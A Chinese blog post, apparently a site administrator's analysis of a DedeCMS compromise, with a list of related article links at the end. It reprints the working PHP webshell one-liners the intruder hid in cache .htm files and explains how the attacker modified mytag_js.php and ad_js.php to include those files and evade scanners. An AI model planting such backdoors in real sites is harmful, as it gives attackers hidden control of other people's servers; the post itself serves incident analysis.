单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.

为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?

无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:

1 {dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}

但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

<!–

2  
3 document.write(“dedecmsisok<?php@eval($_POST[cmd]);?>”);
4 –>
 

<!–

1  
   
  document.write(“axxxxx’);echo‘OK’;@fclose($fp);?>”);
4  
  –>

<!–

2  
3 document.write(“<?php$fp =@fopen(‘av.php’, ‘a’);@fwrite($fp,‘<?php eval($_POST[110])?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
4  
5 –>
  <!–

2 document.write(“<?phpecho ‘dedecms 5.70day<br>guige,90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);
3 –>

看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.

http://www.ji-nuo.com /plus/mytag_js.php?id=1208

http://www.ji-nuo.com /plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.

不怎么懂php,所以分析可能有差错的地方,欢迎指正!更多请关注:济宁网站建设

一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)相关推荐

  1. 一种奇特的DEDE隐藏后门办法

    ? 15:24 / 28 一种奇特的DEDE隐藏后门办法 单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没 ...

  2. dedecms mytag_js.php,一种奇特的DEDE隐藏后门办法_91Ri.org

    单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? ...

  3. 一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)

    一.SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密.SSH 是目前较可靠,专为远程登录会话和其 ...

  4. inrul plus 90sec.php,DEDE木马后门专杀工具 针对 90sec.php 一类

    2013-08-05 2013年8月5日 网络尖刀 讯: 最近使用DEDE的站长最近肯定都被"90sec.php"一类的木马后门没少折腾,删了又出现,出现了再删,一直都没有办法根治 ...

  5. 查杀DeDe数据库后门 网站安全狗DeDe专杀工具

    2019独角兽企业重金招聘Python工程师标准>>> DeDe是国内知名的PHP开源网站管理系统,很多用户都在使用这一系统,网站安全狗DeDe数据库后门查杀工具,主要就是为了帮助用 ...

  6. STL vector的几种清空容器(删除)办法

    1.为什么需要主动释放vector内存 来自 <https://blog.csdn.net/hellokandy/article/details/78500067> vector其中一个特 ...

  7. 【漏洞复现】phpstudy隐藏后门漏洞的验证与利用

    目录 1 背景 2影响版本 3 漏洞验证与利用 3.1验证 3.2利用:写入webshell 1 背景 phpstudy是国内第一款php后端开发调试集成软件,其将php.apache.mysql.p ...

  8. Phpstudy隐藏后门

    Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimizer多款 ...

  9. 整数集上的一种奇特拓扑

    在<Proofs from THE BOOK>里素数无限的六种证明的第五种讲到了一种用点集拓扑学知识证明的方法,其中引入了整数集上的一种奇特拓扑. 对 a,b∈ℤ,b>0a,b \i ...

最新文章

  1. mysql正则表达式regexp_mysql - 正则表达式 RegExp
  2. 软件项目管理0824:标书中疫情条款
  3. gihosoft android 教程,Gihosoft Free Android Data Recovery
  4. 自定义控件详解(四):Paint 画笔路径效果
  5. 动脑2017android_您肯定要在2017年初尝试的25个新Android库
  6. 大数据 Hive spark Flink 关系
  7. Python 学习笔记9(装饰器,decorator)
  8. 一文详解MySQL中的事件调度器EVENT
  9. 新浪微博OAuth认证简介
  10. 福建省小学四年级上册计算机知识点总结,小学四年级上册数学知识点大全【1-6单元】...
  11. java 读取写入excel_java读取和写入Excel文件
  12. java报错root cause_[Filtered request failed.] with root cause java.io.OptionalDataException
  13. 零基础学HTML5的学习路线完整版
  14. Cesium 概述 (一)
  15. linux kde vga参数1366,Archlinux+KDE 下双屏VGA高分辨率设置
  16. 正味集团冲刺港股:年营收3.4亿杨声耀夫妇控制64%股权
  17. [Git]如何撤销上次commit
  18. 一个html5表格代码
  19. VIDEOIO ERROR: V4L/V4L2: VIDIOC_S_CROP
  20. WKT、SRID、EPSG概念

热门文章

  1. 阿里云智能客服机器人,自定义函数调用配置
  2. Typora设置标题自动添加序号
  3. 财务自由之路——为什么选择淘宝(上)
  4. JUNIPER的认证分类
  5. 2022世界杯AI机器人裁判将迎来首秀
  6. 浅析电气火灾监控系统在医院的应用研究
  7. 深度学习入门论文(语音识别领域)
  8. 自定义Imageview控件实现多种手势操作 (拖动、水平缩放、竖直缩放、等比例缩放、双击、长按)
  9. 机器学习十大算法之一:K-means算法
  10. python编码终极版